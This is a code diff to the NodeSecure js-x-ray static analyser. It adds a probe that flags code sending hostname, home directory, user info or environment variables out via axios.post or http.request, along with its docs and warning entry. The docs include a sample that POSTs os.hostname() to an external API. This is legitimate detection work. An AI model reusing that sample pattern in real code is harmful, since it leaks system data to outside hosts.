NodeSecure · clemgbld · Jul 4, 2025
diff --git a/.changeset/shaky-carpets-peel.md b/.changeset/shaky-carpets-peel.md
@@ -0,0 +1,5 @@
+---
+"@nodesecure/js-x-ray": minor
+---
+
+feat(probes): add minimal implementation of data exfiltration probe
diff --git a/docs/data-exfiltration.md b/docs/data-exfiltration.md
@@ -0,0 +1,48 @@
+# Data exfiltration 
+
+| Code | Severity | i18n | Experimental |
+| --- | --- | --- | :-: |
+| data-exfiltration | `Warning` | `sast_warnings.data_exfiltration` | ❌ | 
+
+## Introduction
+
+Data exfiltration is the unauthorized transfer of sensitive data from a computer or network to an external location. This can occur through malicious code, insider threats, or compromised systems.
+
+## Example
+
+```js
+import http from "http";
+import os from "os";
+
+const postData = os.hostname();
+
+const options = {
+  hostname: 'api.example.com',
+  port: 80,
+  path: '/users',
+  method: 'POST',
+  headers: {
+    'Content-Type': 'application/json',
+    'Content-Length': Buffer.byteLength(postData)
+  }
+};
+
+const request = http.request; 
+
+const req = request(options, (res) => {
+  console.log(`Status: ${res.statusCode}`);
+  console.log(`Headers: ${JSON.stringify(res.headers)}`);
+
+  res.setEncoding('utf8');
+  res.on('data', (chunk) => {
+    console.log(`Response: ${chunk}`);
+  });
+});
+
+req.on('error', (e) => {
+  console.error(`Request error: ${e.message}`);
+});
+
+req.write(postData);
+req.end();
+```
diff --git a/workspaces/js-x-ray/src/ProbeRunner.ts b/workspaces/js-x-ray/src/ProbeRunner.ts
@@ -19,6 +19,7 @@ import isFetch from "./probes/isFetch.js";
 import isUnsafeCommand from "./probes/isUnsafeCommand.js";
 import isSyncIO from "./probes/isSyncIO.js";
 import isSerializeEnv from "./probes/isSerializeEnv.js";
+import dataExfiltration from "./probes/dataExfiltration.js";
 
 import type { SourceFile } from "./SourceFile.js";
 import type { OptionalWarningName } from "./warnings.js";
@@ -70,7 +71,8 @@ export class ProbeRunner {
     isBinaryExpression,
     isArrayExpression,
     isUnsafeCommand,
-    isSerializeEnv
+    isSerializeEnv,
+    dataExfiltration
   ];
 
   static Optionals: Record<OptionalWarningName, Probe> = {

diff --git a/workspaces/js-x-ray/src/probes/dataExfiltration.ts b/workspaces/js-x-ray/src/probes/dataExfiltration.ts
@@ -0,0 +1,205 @@
+// Import Third-party Dependencies
+import { getCallExpressionIdentifier, getMemberExpressionIdentifier } from "@nodesecure/estree-ast-utils";
+import type { ESTree } from "meriyah";
+import type { AssignmentMemory, VariableTracer } from "@nodesecure/tracer";
+import { match } from "ts-pattern";
+
+// Import Internal Dependencies
+import { SourceFile } from "../SourceFile.js";
+import { generateWarning } from "../warnings.js";
+
+// Constants
+const kSensitiveNodeCoreModulesMethods = [
+  "os.hostname",
+  "os.homedir",
+  "os.userInfo"
+];
+
+function validateNode(
+  node: ESTree.Node,
+  { tracer }: SourceFile
+): [boolean, any?] {
+  const httpRequestAssignmentInMemory = tracer
+    .getDataFromIdentifier("http.request")?.assignmentMemory;
+
+  if (httpRequestAssignmentInMemory && httpRequestAssignmentInMemory.length > 0) {
+    const lastRequestCreated = getLastReturnValue(httpRequestAssignmentInMemory);
+    if (lastRequestCreated && !tracer.getDataFromIdentifier(`${lastRequestCreated.name}.write`)) {
+      tracer.trace(`${lastRequestCreated.name}.write`, {
+        followConsecutiveAssignment: true
+      });
+    }
+  }
+
+  const id = getCallExpressionIdentifier(node);
+
+  if (id === null) {
+    return [false];
+  }
+
+  const data = tracer.getDataFromIdentifier(id);
+
+  if (tracer.importedModules.has("axios") && data?.identifierOrMemberExpr === "axios.post") {
+    return [true];
+  }
+
+  if (
+    tracer.importedModules.has("http") && httpRequestAssignmentInMemory && httpRequestAssignmentInMemory.length > 0) {
+    if (httpRequestAssignmentInMemory.some(({ name }) => `${name}.write` === data?.identifierOrMemberExpr)) {
+      return [true];
+    }
+  }
+
+  return [false];
+}
+
+function getLastReturnValue(assignmentInMemory: AssignmentMemory[]) {
+  for (let i = assignmentInMemory.length - 1; i >= 0; i--) {
+    if (assignmentInMemory[i].type === "ReturnValueAssignment") {
+      return assignmentInMemory[i];
+    }
+  }
+
+  return null;
+}
+
+function initialize(
+  sourceFile: SourceFile
+) {
+  sourceFile.tracer.trace("axios.post", {
+    followConsecutiveAssignment: true,
+    moduleName: "axios"
+  }).trace("process.env", {
+    followConsecutiveAssignment: true
+  }).trace("os.hostname", {
+    moduleName: "os",
+    followConsecutiveAssignment: true,
+    followReturnValueAssignement: true
+  }).trace("os.homedir", {
+    moduleName: "os",
+    followConsecutiveAssignment: true,
+    followReturnValueAssignement: true
+  })
+    .trace("os.userInfo", {
+      moduleName: "os",
+      followConsecutiveAssignment: true,
+      followReturnValueAssignement: true
+    })
+    .trace("http.request", {
+      moduleName: "http",
+      followConsecutiveAssignment: true,
+      followReturnValueAssignement: true
+    });
+}
+
+function main(
+  node: ESTree.CallExpression,
+  { sourceFile }: { sourceFile: SourceFile; }
+): void {
+  const exfilteredData = node.arguments.flatMap(
+    getExfilteredData(sourceFile.tracer)
+  );
+  if (exfilteredData.length > 0) {
+    const warning = generateWarning(
+      "data-exfiltration",
+      { value: buildValue(exfilteredData), location: node.loc }
+    );
+    sourceFile.warnings.push(warning);
+  }
+}
+
+type ExfilteredData = {
+  name: string;
+  isCalled: boolean;
+};
+
+function buildValue(exfilteredData: ExfilteredData[]) {
+  return `[${[...new Set(exfilteredData.map(({ name, isCalled }) => (isCalled ? `${name}()` : name)))]}]`;
+}
+
+function getExfilteredData(tracer: VariableTracer) {
+  function recur(arg: ESTree.Node | null): ExfilteredData[] {
+    if (arg === null) {
+      return [];
+    }
+
+    return match(arg)
+      .with({ type: "MemberExpression" }, (memberExpr) => {
+        const memberExprId = [...getMemberExpressionIdentifier(memberExpr)].join(".");
+        if (memberExprId === "process.env") {
+          return [{ name: memberExprId, isCalled: false }];
+        }
+
+        if (memberExpr.object.type === "CallExpression" && getCallExpressionIdentifier(memberExpr.object) === "os.userInfo") {
+          return [{ name: "os.userInfo", isCalled: true }];
+        }
+
+        return [];
+      })
+      .with({ type: "Identifier" }, (identifier) => {
+        const sensitiveMethods = kSensitiveNodeCoreModulesMethods
+          .filter(checkIdentifer({ identifier, tracer }))
+          .map((sensitiveMethod) => {
+            return { name: sensitiveMethod, isCalled: true };
+          });
+
+        return tracer.getDataFromIdentifier("process.env")?.assignmentMemory
+          .some(({ name }) => name === identifier.name) ?
+          [{ name: "process.env", isCalled: false }, ...sensitiveMethods] : sensitiveMethods;
+      })
+      .with({ type: "CallExpression" }, (callExpr) => {
+        const sensitiveMethod = kSensitiveNodeCoreModulesMethods.find(checkCallExpression({ callExpr, tracer }));
+
+        if (sensitiveMethod) {
+          return [{ name: sensitiveMethod, isCalled: true }];
+        }
+
+        return [];
+      })
+      .with({ type: "ObjectExpression" }, (objExpr) => objExpr.properties.flatMap((expr) => match(expr)
+        .with({ type: "Property" }, (prop) => recur(prop.value))
+        .with({ type: "SpreadElement" }, (spreadExpr) => recur(spreadExpr.argument))
+        .otherwise(() => [])))
+      .with({ type: "ArrayExpression" }, (arrayExpr) => arrayExpr.elements.flatMap(recur))
+      .with({ type: "SpreadElement" }, (spreadExpr) => recur(spreadExpr.argument))
+      .otherwise(() => []);
+  }
+
+  return recur;
+}
+
+function checkIdentifer({
+  tracer,
+  identifier
+}: {
+  tracer: VariableTracer;
+  identifier: ESTree.Identifier;
+}) {
+  return (method: string) => tracer.getDataFromIdentifier(method)?.assignmentMemory
+    .some(({ name, type }) => name === identifier.name && type === "ReturnValueAssignment");
+}
+
+function checkCallExpression({
+  tracer,
+  callExpr
+}: {
+  tracer: VariableTracer;
+  callExpr: ESTree.CallExpression;
+}) {
+  return (method: string) => {
+    const [moduleName] = method.split(".");
+    const id = getCallExpressionIdentifier(callExpr)!;
+    const data = tracer.getDataFromIdentifier(id);
+
+    return tracer.importedModules.has(moduleName) &&
+      data?.identifierOrMemberExpr === method;
+  };
+}
+
+export default {
+  name: "dataExfiltration",
+  validateNode,
+  main,
+  initialize,
+  breakOnMatch: false
+};
diff --git a/workspaces/js-x-ray/src/warnings.ts b/workspaces/js-x-ray/src/warnings.ts
@@ -26,6 +26,7 @@ export type WarningName =
   | "unsafe-command"
   | "unsafe-import"
   | "serialize-environment"
+  | "data-exfiltration"
   | OptionalWarningName;
 
 export interface Warning<T = WarningName> {
@@ -103,6 +104,11 @@ export const warnings = Object.freeze({
     i18n: "sast_warnings.serialize_environment",
     severity: "Warning",
     experimental: false
+  },
+  "data-exfiltration": {
+    i18n: "sast_warnings.data_exfiltration",
+    severity: "Warning",
+    experimental: false
   }
 }) satisfies Record<WarningName, Pick<Warning, "experimental" | "i18n" | "severity">>;